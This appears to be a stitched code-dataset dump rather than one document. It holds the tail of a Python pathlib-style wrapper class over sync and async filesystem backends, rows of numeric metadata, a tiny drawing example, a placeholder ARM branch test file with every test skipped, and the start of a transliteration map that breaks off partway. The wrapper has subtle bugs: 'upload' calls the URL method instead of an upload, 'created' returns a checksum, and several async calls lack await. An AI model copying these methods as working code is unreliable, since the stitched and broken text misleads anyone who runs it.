return self.sync_fs.cat(self._cpath_str, recursive, on_error, **kwargs)
def cat_file(self, start: Optional[int] = None, end: Optional[int] = None, **kwargs):
"""
Get the content of a file
"""
return self.sync_fs.cat_file(self._cpath_str, start=start, end=end, **kwargs)
def copy(self, dest: base.PathLike, recursive: bool = False, overwrite: bool = False, skip_errors: bool = False) -> _P:
"""
Copies the File to the Dir/File.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
self.sync_fs.copy(self._cpath_str, _dest._cpath_str, recursive = recursive)
return _dest
def download(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
self.sync_fs.download(self._cpath_str, _dest._cpath_str, recursive = recursive, callback = callback)
return _dest
def du(self, total: Optional[int] = None, maxdepth: Optional[int] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
return self.sync_fs.du(self._cpath_str, total, maxdepth, **kwargs)
def find(self, path: Optional[str] = None, maxdepth: Optional[int] = None, withdirs: bool = False, detail: bool = False, prefix: Optional[str] = None, **kwargs):
"""
List all files below path.
"""
p = self if not path else self.joinpath(path)
return self.sync_fs.find(p, maxdepth=maxdepth, withdirs=withdirs, detail=detail, prefix=prefix, **kwargs)
def get_checksum(self, refresh: bool = False, **kwargs):
"""
Unique value for current version of file
"""
return self.sync_fs.checksum(self._cpath_str, refresh=refresh, **kwargs)
def get_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy single remote file to local
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
return self.sync_fs.get_file(self._cpath_str, _dest._cpath_str, callback=callback, **kwargs)
def get_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
return self.sync_fs.get(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
def glob(self, pattern: str, **kwargs) -> Iterator[_P]:
"""
Yielding all matching files (of any kind).
"""
uri_scheme = self._uri_scheme
for f in self.sync_fs.glob(self._PATH.join(self._path_str, pattern)._cpath_str, **kwargs):
if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
else: yield self._new(f)
def head(self, size: Optional[int] = None):
"""
Get the first size bytes from file
"""
return self.sync_fs.head(self._cpath_str, size)
def iterdir(self, **kwargs) -> Iterator[_P]:
"""
Iterates over the directory.
"""
uri_scheme = self._uri_scheme
for f in self.sync_fs.glob(self._cpath_str, **kwargs):
if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
else: yield self._new(f)
def get_modified(self, version_id: str = None, refresh: bool = False, **kwargs):
"""
Return the last modified timestamp of file at path as a datetime
"""
return self.sync_fs.modified(self._cpath_str, version_id=version_id, refresh=refresh, **kwargs)
## return self.sync_fs.modified(self._cpath_str,
def ls(self, detail: bool = False, **kwargs):
"""
List objects at path.
"""
return self.sync_fs.ls(self._cpath_str, detail=detail, **kwargs)
def mkdir(self, mode: int = 0o777, parents: bool = False, exist_ok: bool = False) -> None:
"""
Create a new directory at this given path.
"""
## Will return if exist_ok first, otherwise will fail check
if self.exists() and exist_ok: return
return self.sync_fs.mkdir(self._cpath_str, mode=mode, create_parents=parents, exist_ok=exist_ok)
def move(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
def mv(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
def open(self, mode: str = 'r', encoding: Optional[str] = base.DEFAULT_ENCODING, errors: Optional[str] = None, block_size: int = 5242880, compression: str = 'infer', **kwargs: Any) -> typing.IO[Union[str, bytes]]:
"""Opens the file."""
filelike = self.sync_fs.open(self._cpath_str, mode=mode, encoding=encoding, errors=errors, block_size=block_size, compression=compression, **kwargs)
filelike = typing.cast(typing.IO[Union[str, bytes]], filelike)
return filelike
def put_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file from local.
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.put_file(self._cpath_str, _dest._cpath_str, callback = callback, **kwargs)
return _dest
def put_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) from local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.put(self._cpath_str, _dest._cpath_str, recursive=recursive, callback = callback, **kwargs)
return _dest
def remove(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
return self.sync_fs.rm(self._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
def rename(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Rename file or directory to the given target.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.sync_fs.rename(self._cpath_str, _dest._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
return _dest
def replace(self, target: base.PathLike) -> _P:
"""
Replace file or directory to the given target.
"""
_dest = self._get_dest(target, overwrite=True)
self.sync_fs.rename(self._cpath_str, _dest._cpath_str)
def rm(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
self.sync_fs.rm(self._cpath_str, recursive, maxdepth, **kwargs)
def rm_file(self, missing_ok: bool = True, **kwargs):
"""
Delete a file
"""
if not self.exists():
if missing_ok: return
raise ValueError(f"{self._path_str} does not exist")
self.sync_fs.rm_file(self._cpath_str, **kwargs)
def rmdir(self, force: bool = False, recursive: bool = True, skip_errors: bool = True) -> None:
"""
Remove the empty directory.
If force, will recursively remove even if not empty.
"""
try:
return self.sync_fs.rmdir(self._cpath_str)
except Exception as e:
if force: return self.sync_fs.rm(self._cpath_str, recursive = recursive)
if skip_errors: return
raise e
def rmtree(self, recursive: bool = True, maxdepth: Optional[int] = None) -> None:
"""Remove the directory."""
return self.sync_fs.rm(self._cpath_str, recursive, maxdepth)
def sign(self, expiration: int = 100, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
return self.sync_fs.sign(self._cpath_str, expiration, **kwargs)
def split_path(self, **kwargs) -> List[str]:
"""
Normalise path string into bucket and key
"""
return self.sync_fs.split_path(self._cpath_str, **kwargs)
def tail(self, size: Optional[int] = None):
"""
Get the last size bytes from file
"""
return self.sync_fs.tail(self._cpath_str, size)
def touch(self, truncate: bool = True, data = None, **kwargs):
"""
Create empty file or truncate
"""
return self.sync_fs.touch(self._cpath_str, truncate = truncate, data = data, **kwargs)
def unlink(self, missing_ok: bool = True, **kwargs) -> None:
"""
Remove this file or symbolic link.
"""
if getattr(self.sync_fs, 'unlink', None): return self.sync_fs.unlink(self._cpath_str, missing_ok = missing_ok, **kwargs)
return self.rm_file(missing_ok, **kwargs)
def url(self, expires: int = 3600, client_method: str = 'get_object', **kwargs):
"""
Generate presigned URL to access path by HTTP
"""
return self.sync_fs.url(self._cpath_str, expires, client_method, **kwargs)
def upload(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) from local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
return self.sync_fs.url(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
def get_bucket(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket with optional prefix
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
if prefix: return f'{uri_scheme}://' + parts[0]
return parts[0]
def get_bucket_path(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket + path with optional prefix
removes the versioning
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
p = '/'.join(parts[:2])
if prefix: return f'{uri_scheme}://' + p
return p
def resolve(self, strict: bool = False):
"""
Returns the abolute path.
"""
if self.is_cloud: return self._new(self.as_posix())
return self._new(self._PATH.abspath(self._path_str))
@property
def bucket(self) -> Optional[str]:
if not self.is_cloud: return None
parts = self.split_path()
return parts[0]
@property
def bucket_path(self) -> Optional[str]:
if not self.is_cloud: return None
parts = self.split_path()
return parts[1]
@property
def _path_str(self) -> str:
"""
Returns the `__fspath__` string representation.
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(f'{uri_scheme}://', *self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
@property
def string(self) -> str:
"""
Returns the extension for a file
"""
return self._path_str
@property
def _filename_str(self) -> str:
"""
Returns the filename if is file, else ''
"""
if self.is_file(): return self.parts[-1]
return ''
@property
def extension(self) -> str:
"""
Returns the extension for a file
"""
return self.suffix
@property
def _cpath_str(self) -> str:
"""
Returns the `__fspath__` string representation without the uri_scheme
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(*self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
@property
def checksum(self):
"""
Unique value for current version of file without refreshing
"""
return self.get_checksum()
@property
def created(self):
"""
Return the created timestamp of a file as a datetime
"""
return self.get_checksum()
@property
def exist(self) -> bool:
"""
Returns True if self exists.
"""
return self.exists()
@property
def info(self):
"""
Give details of entry at path
"""
return self.sync_fs.info(self._cpath_str)
@property
def isdir(self) -> bool:
"""
Returns True if self is a directory.
"""
return self.is_dir()
@property
def isfile(self) -> bool:
"""
Returns True if self is a file.
"""
return self.is_file()
@property
def modified(self):
"""
Return the last modified timestamp of file at path as a datetime without refreshing
"""
return self.get_modified()
@property
def size(self):
"""
Size in bytes of file
"""
return self.sync_fs.size(self._cpath_str)
@property
def stat(self):
"""
Give details of entry at path
"""
return self.sync_fs.stat(self._cpath_str)
@property
def home(self) -> Optional[str]:
"""
Returns the home directory/bucket
"""
if self.is_cloud: return self._new(self.get_bucket(True))
p = os.path.expanduser('~')
return self._new(p)
###############################################################
#### Async Versions of the Sync Functions ###
###############################################################
def _get_afs_attr(self, name: str, default: Optional[Callable] = None):
return getattr(self.async_fs, f'_{name}', getattr(self.async_fs, name, default))
async def async_info(self):
"""
Give details of entry at path
"""
try: return await self._get_afs_attr('info')(self._cpath_str)
except: return self.sync_fs.info(self._cpath_str)
#return await self.async_fs._info(self._cpath_str)
async def async_exists(self) -> bool:
"""
Returns True if self exists.
"""
try: return await self._get_afs_attr('exists')(self._cpath_str)
except: return self.sync_fs.exists(self._cpath_str)
#return await self.async_fs._exists(self._cpath_str)
async def async_is_dir(self) -> bool:
"""
Returns True if self is a directory.
"""
try: return await self._get_afs_attr('info')(self._cpath_str)
except: return self.sync_fs.info(self._cpath_str)
#return await self.async_fs._isdir(self._cpath_str)
async def async_is_file(self) -> bool:
"""Returns True if self is a file."""
try: return await self._get_afs_attr('isfile')(self._cpath_str)
except: return self.sync_fs.isfile(self._cpath_str)
# return await self.async_fs._isfile(self._cpath_str)
async def async_cat(self, recursive: bool = False, on_error: Optional[str] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
try: return self._get_afs_attr('cat')(self._cpath_str, recursive, on_error, **kwargs)
except: return self.sync_fs.cat(self._cpath_str, recursive, on_error, **kwargs)
#return await self.async_fs._cat(self._cpath_str, recursive, on_error, **kwargs)
async def async_cat_file(self, start: Optional[int] = None, end: Optional[int] = None, **kwargs):
"""
Get the content of a file
"""
return await self.async_fs._cat_file(self._cpath_str, start=start, end=end, **kwargs)
async def async_copy(self, dest: base.PathLike, recursive: bool = False, overwrite: bool = False, skip_errors: bool = False) -> _P:
"""
Copies the File to the Dir/File.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
await self.async_fs._copy(self._cpath_str, _dest._cpath_str, recursive = recursive)
return _dest
async def async_download(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive, overwrite, skip_errors)
await self.async_fs._download(self._cpath_str, _dest._cpath_str, recursive = recursive, callback = callback)
return _dest
async def async_du(self, total: Optional[int] = None, maxdepth: Optional[int] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
return await self.async_fs._du(self._cpath_str, total, maxdepth, **kwargs)
async def async_expand_path(self, recursive: bool = False, maxdepth: Optional[int] = None):
"""
Turn one or more globs or directories into a list of all matching paths to files or directories.
"""
paths = await self.async_fs._expand_path(recursive = recursive, maxdepth = maxdepth)
return [self._new(p) for p in paths]
async def async_find(self, path: Optional[str] = None, maxdepth: Optional[int] = None, withdirs: bool = False, detail: bool = False, prefix: Optional[str] = None, **kwargs):
"""
List all files below path.
"""
p = self if not path else self.joinpath(path)
return await self.async_fs._find(p, maxdepth=maxdepth, withdirs=withdirs, detail=detail, prefix=prefix, **kwargs)
async def async_get_checksum(self, refresh: bool = False, **kwargs):
"""
Unique value for current version of file
"""
return await self.async_fs.checksum(self._cpath_str, **kwargs)
#return self.async_fs.checksum(self._cpath_str, refresh=refresh, **kwargs)
async def async_get_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy single remote file to local
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
return await self.async_fs._get_file(self._cpath_str, _dest._cpath_str, callback=callback, **kwargs)
async def async_get_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) to local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
return await self.async_fs._get(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
async def async_glob(self, pattern: str, **kwargs) -> Iterator[_P]:
"""
Yielding all matching files (of any kind).
"""
uri_scheme = self._uri_scheme
for f in await self.async_fs._glob(self._PATH.join(self._path_str, pattern)._cpath_str, **kwargs):
if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
else: yield self._new(f)
async def async_head(self, size: Optional[int] = None):
"""
Get the first size bytes from file
"""
return self.async_fs.head(self._cpath_str, size)
async def async_iterdir(self, **kwargs) -> Iterator[_P]:
"""
Iterates over the directory.
"""
uri_scheme = self._uri_scheme
for f in await self.async_fs._glob(self._cpath_str, **kwargs):
if self.is_cloud: yield self._new(f'{uri_scheme}://' + f)
else: yield self._new(f)
async def async_get_modified(self, version_id: str = None, refresh: bool = False, **kwargs):
"""
Return the last modified timestamp of file at path as a datetime
"""
return self.async_fs.modified(self._cpath_str, version_id=version_id, refresh=refresh, **kwargs)
async def async_ls(self, detail: bool = False, **kwargs):
"""
List objects at path.
"""
return await self.async_fs._ls(self._cpath_str, detail=detail, **kwargs)
async def async_mkdir(self, mode: int = 0o777, parents: bool = False, exist_ok: bool = False) -> None:
"""
Create a new directory at this given path.
"""
if self.exists() and exist_ok: return
return await self.async_fs._mkdir(self._cpath_str, mode=mode, create_parents=parents, exist_ok=exist_ok)
async def async_move(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.async_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
async def async_mv(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Move file(s) from one location to another
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.async_fs.move(self._cpath_str, _dest._cpath_str, recursive = recursive, maxdepth=maxdepth)
return _dest
async def async_open(self, mode: str = 'r', encoding: Optional[str] = base.DEFAULT_ENCODING, errors: Optional[str] = None, block_size: int = 5242880, compression: str = 'infer', **kwargs: Any) -> typing.IO[Union[str, bytes]]:
"""Opens the file."""
filelike = await self.async_fs._open(self._cpath_str, mode=mode, encoding=encoding, errors=errors, block_size=block_size, compression=compression, **kwargs)
filelike = typing.cast(typing.IO[Union[str, bytes]], filelike)
return filelike
async def async_put_file(self, dest: base.PathLike, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file from local.
"""
_dest = self._get_dest(dest, overwrite=overwrite, skip_errors=skip_errors)
await self.async_fs._put_file(self._cpath_str, _dest._cpath_str, callback = callback, **kwargs)
return _dest
async def async_put_files(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) from local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
await self.async_fs._put(self._cpath_str, _dest._cpath_str, recursive=recursive, callback = callback, **kwargs)
return _dest
async def async_remove(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
return await self.async_fs._rm(self._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
async def async_rename(self, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Rename file or directory to the given target.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
self.async_fs.rename(self._cpath_str, _dest._cpath_str, recursive=recursive, maxdepth = maxdepth, **kwargs)
return _dest
async def async_replace(self, target: base.PathLike) -> _P:
"""
Replace file or directory to the given target.
"""
_dest = self._get_dest(target, overwrite=True)
self.async_fs.rename(self._cpath_str, _dest._cpath_str)
async def async_rm(self, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
await self.async_fs._rm(self._cpath_str, recursive, maxdepth, **kwargs)
async def async_rm_file(self, missing_ok: bool = True, **kwargs):
"""
Delete a file
"""
if not await self.async_exists():
if missing_ok: return
raise ValueError(f"{self._path_str} does not exist")
await self.async_fs._rm_file(self._cpath_str, **kwargs)
async def async_rmdir(self, force: bool = False, recursive: bool = True, skip_errors: bool = True) -> None:
"""
Remove the empty directory.
If force, will recursively remove even if not empty.
"""
try:
return self.async_fs.rmdir(self._cpath_str)
except Exception as e:
if force: return await self.async_fs._rm(self._cpath_str, recursive = recursive)
if skip_errors: return
raise e
async def async_rmtree(self, recursive: bool = True, maxdepth: Optional[int] = None) -> None:
"""Remove the directory."""
return await self.async_fs._rm(self._cpath_str, recursive, maxdepth)
async def async_sign(self, expiration: int = 100, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
return self.async_fs.sign(self._cpath_str, expiration, **kwargs)
async def async_size(self, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
return await self.async_fs._size(self._cpath_str, **kwargs)
async def async_split_path(self, **kwargs) -> List[str]:
"""
Normalise path string into bucket and key
"""
return self.async_fs.split_path(self._cpath_str, **kwargs)
async def async_tail(self, size: Optional[int] = None):
"""
Get the last size bytes from file
"""
return self.async_fs.tail(self._cpath_str, size)
async def async_touch(self, truncate: bool = True, data = None, **kwargs):
"""
Create empty file or truncate
"""
return await self.async_fs.touch(self._cpath_str, truncate = truncate, data = data, **kwargs)
async def async_unlink(self, missing_ok: bool = True, **kwargs) -> None:
"""
Remove this file or symbolic link.
"""
if getattr(self.async_fs, 'unlink', None): return self.async_fs.unlink(self._cpath_str, missing_ok = missing_ok, **kwargs)
return await self.async_rm_file(missing_ok, **kwargs)
async def async_url(self, expires: int = 3600, client_method: str = 'get_object', **kwargs):
"""
Generate presigned URL to access path by HTTP
"""
return self.async_fs.url(self._cpath_str, expires, client_method, **kwargs)
async def async_upload(self, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, overwrite: bool = False, skip_errors: bool = False, **kwargs):
"""
Copy file(s) from local.
"""
_dest = self._get_dest(dest, recursive=recursive, overwrite=overwrite, skip_errors=skip_errors)
return self.async_fs.url(self._cpath_str, _dest._cpath_str, recursive=recursive, callback=callback, **kwargs)
class WindowsFSxPath(PosixFSxPath, pathlib.PureWindowsPath):
_PATH = ntpath
class PosixIOPath(PosixFSxPath, pathlib.PurePosixPath):
"""
Pathlib-like API around `upath` providing compatability with many i/o. Does not provide Async
"""
_PATH = posixpath
_FSX: 'upath.UPath' = None
_SYNC_FS: 'upath.UPath' = None
_ASYNC_FS: Any = None
_FSX_LIB: str = 'upath'
_FSX_MODULE: Optional[str] = None
_FSX_CLS: str = 'UPath'
@property
def async_fs(self) -> 'AsyncFileSystem':
raise NotImplementedError
@property
def sync_fs(self) -> 'upath.UPath':
return upath.UPath
class WindowsIOPath(PosixIOPath, pathlib.PureWindowsPath):
"""
Pathlib-like API around `upath` providing compatability with many i/o. Does not provide Async
"""
_PATH = ntpath
os.PathLike.register(PosixFSxPath)
os.PathLike.register(WindowsFSxPath)
os.PathLike.register(PosixIOPath)
os.PathLike.register(WindowsIOPath)
| 36.401804
| 229
| 0.613707
| 6,457
| 52,455
| 4.795571
| 0.059161
| 0.029711
| 0.034491
| 0.018602
| 0.84757
| 0.812143
| 0.785758
| 0.752398
| 0.719393
| 0.704699
| 0
| 0.002531
| 0.269374
| 52,455
| 1,440
| 230
| 36.427083
| 0.805427
| 0.113068
| 0
| 0.491525
| 0
| 0
| 0.02543
| 0.002188
| 0
| 0
| 0
| 0
| 0.00565
| 1
| 0.213277
| false
| 0.001412
| 0.021186
| 0.021186
| 0.460452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
564f6fb25f1a0031af8e85326aebe06a4789188c
| 132
|
py
|
Python
|
examples/example_005.py
|
Canvim/Pyper
|
5ec310027c94f98349b7f5a728b42540380a34c2
|
[
"MIT"
] | 2
|
2020-07-29T06:48:18.000Z
|
2020-10-13T19:35:53.000Z
|
examples/example_005.py
|
Canvim/PyPen
|
5ec310027c94f98349b7f5a728b42540380a34c2
|
[
"MIT"
] | 8
|
2020-07-19T21:41:58.000Z
|
2020-09-02T09:39:02.000Z
|
examples/example_005.py
|
Canvim/PyPen
|
5ec310027c94f98349b7f5a728b42540380a34c2
|
[
"MIT"
] | null | null | null |
from pypen import *
def start():
for x, y in pixels():
rectangle(x, y, 1, 1, (random(255), random(255), random(255)))
| 18.857143
| 70
| 0.575758
| 21
| 132
| 3.619048
| 0.666667
| 0.355263
| 0.394737
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11
| 0.242424
| 132
| 6
| 71
| 22
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
568f87d9633f971994a98ee93d1fb03ac90a3092
| 1,720
|
py
|
Python
|
tests/iarm/test_branch.py
|
howardjp/iMCS-48
|
b545a37a9b15fdcdacb4e2ba263f45a9c62df079
|
[
"MIT"
] | 20
|
2016-05-16T18:23:49.000Z
|
2021-08-06T17:15:34.000Z
|
tests/iarm/test_branch.py
|
howardjp/iMCS-48
|
b545a37a9b15fdcdacb4e2ba263f45a9c62df079
|
[
"MIT"
] | 11
|
2016-07-14T17:57:10.000Z
|
2020-11-18T21:11:21.000Z
|
tests/iarm/test_branch.py
|
howardjp/iMCS-48
|
b545a37a9b15fdcdacb4e2ba263f45a9c62df079
|
[
"MIT"
] | 4
|
2016-08-14T19:11:21.000Z
|
2021-08-18T09:38:25.000Z
|
from .test_iarm import TestArm
import iarm.exceptions
import unittest
class TestArmUnconditionalBranch(TestArm):
@unittest.skip('No Test Defined')
def test_B(self):
pass
@unittest.skip('No Test Defined')
def test_BL(self):
pass
@unittest.skip('No Test Defined')
def test_BLX(self):
pass
@unittest.skip('No Test Defined')
def test_BX(self):
pass
class TestArmConditionalBranch(TestArm):
@unittest.skip('No Test Defined')
def test_BCC(self):
pass
@unittest.skip('No Test Defined')
def test_BCS(self):
pass
@unittest.skip('No Test Defined')
def test_BEQ(self):
pass
@unittest.skip('No Test Defined')
def test_BGE(self):
pass
@unittest.skip('No Test Defined')
def test_BGT(self):
pass
@unittest.skip('No Test Defined')
def test_BHI(self):
pass
@unittest.skip('No Test Defined')
def test_BHS(self):
pass
@unittest.skip('No Test Defined')
def test_BLE(self):
pass
@unittest.skip('No Test Defined')
def test_BLO(self):
pass
@unittest.skip('No Test Defined')
def test_BLS(self):
pass
@unittest.skip('No Test Defined')
def test_BLT(self):
pass
@unittest.skip('No Test Defined')
def test_BMI(self):
pass
@unittest.skip('No Test Defined')
def test_BNE(self):
pass
@unittest.skip('No Test Defined')
def test_BPL(self):
pass
@unittest.skip('No Test Defined')
def test_BVC(self):
pass
@unittest.skip('No Test Defined')
def test_BVS(self):
pass
if __name__ == '__main__':
unittest.main()
| 18.901099
| 42
| 0.604651
| 221
| 1,720
| 4.574661
| 0.176471
| 0.237389
| 0.276954
| 0.356083
| 0.789318
| 0.789318
| 0.789318
| 0.789318
| 0.712166
| 0
| 0
| 0
| 0.281395
| 1,720
| 90
| 43
| 19.111111
| 0.817961
| 0
| 0
| 0.597015
| 0
| 0
| 0.17907
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.298507
| false
| 0.298507
| 0.044776
| 0
| 0.373134
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
3b09c0c3514323a9bf6c3fb4f8e1e58c43083d1e
| 6,970
|
py
|
Python
|
urlify.py
|
dreikanter/python-urlify
|
69c68bdd007ea7d33e79bbb2f7e366d5bcda3a02
|
[
"MIT"
] | 7
|
2015-03-20T12:10:51.000Z
|
2017-10-26T03:07:37.000Z
|
urlify.py
|
dreikanter/python-urlify
|
69c68bdd007ea7d33e79bbb2f7e366d5bcda3a02
|
[
"MIT"
] | null | null | null |
urlify.py
|
dreikanter/python-urlify
|
69c68bdd007ea7d33e79bbb2f7e366d5bcda3a02
|
[
"MIT"
] | 3
|
2015-03-20T12:10:59.000Z
|
2020-09-29T11:17:16.000Z
|
# coding: utf-8
import re
__author__ = 'Alex Musayev'
__license__ = 'MIT'
__status__ = 'Development'
__url__ = 'http://github.com/dreikanter/python-urlify'
__version_info__ = (0, 0, 1)
__version__ = '.'.join(map(str, __version_info__))
UBERMAP = {
# Latin:
ord(u'À'): u'A',
ord(u'Á'): u'A',
ord(u'Â'): u'A',
ord(u'Ã'): u'A',
ord(u'Ä'): u'A',
ord(u'Å'): u'A',
ord(u'Æ'): u'AE',
ord(u'Ç'): u'C',
ord(u'È'): u'E',
ord(u'É'): u'E',
ord(u'Ê'): u'E',
ord(u'Ë'): u'E',
ord(u'Ì'): u'I',
ord(u'Í'): u'I',
ord(u'Î'): u'I',
ord(u'Ï'): u'I',
ord(u'Ð'): u'D',
ord(u'Ñ'): u'N',
ord(u'Ò'): u'O',
ord(u'Ó'): u'O',
ord(u'Ô'): u'O',
ord(u'Õ'): u'O',
ord(u'Ö'): u'O',
ord(u'Ő'): u'O',
ord(u'Ø'): u'O',
ord(u'Ù'): u'U',
ord(u'Ú'): u'U',
ord(u'Û'): u'U',
ord(u'Ü'): u'U',
ord(u'Ű'): u'U',
ord(u'Ý'): u'Y',
ord(u'Þ'): u'TH',
ord(u'ß'): u'ss',
ord(u'à'): u'a',
ord(u'á'): u'a',
ord(u'â'): u'a',
ord(u'ã'): u'a',
ord(u'ä'): u'a',
ord(u'å'): u'a',
ord(u'æ'): u'ae',
ord(u'ç'): u'c',
ord(u'è'): u'e',
ord(u'é'): u'e',
ord(u'ê'): u'e',
ord(u'ë'): u'e',
ord(u'ì'): u'i',
ord(u'í'): u'i',
ord(u'î'): u'i',
ord(u'ï'): u'i',
ord(u'ð'): u'd',
ord(u'ñ'): u'n',
ord(u'ò'): u'o',
ord(u'ó'): u'o',
ord(u'ô'): u'o',
ord(u'õ'): u'o',
ord(u'ö'): u'o',
ord(u'ő'): u'o',
ord(u'ø'): u'o',
